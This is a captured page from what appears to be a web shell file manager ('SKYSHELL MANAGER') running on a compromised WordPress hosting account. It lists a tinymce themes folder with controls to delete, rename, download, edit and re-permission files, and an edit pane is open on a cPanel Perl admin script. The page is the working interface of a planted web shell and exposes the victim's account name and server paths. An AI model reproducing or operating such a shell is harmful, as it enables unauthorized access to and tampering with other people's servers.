📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: SQLite
#!/usr/local/cpanel/3rdparty/bin/perl package HostingCommon::SQLite; use strict; use warnings "all"; use parent 'Cpanel::AdminBin::Script::Call'; use lib '/var/cpanel/perl5/lib'; use NameCheap::DCV::Results; __PACKAGE__->run() if !caller; sub _actions { return qw( populate_db ) } sub populate_db { my ($self, $domain, $result) = @_; return NameCheap::DCV::Results::add($domain, $result); } 1;
Save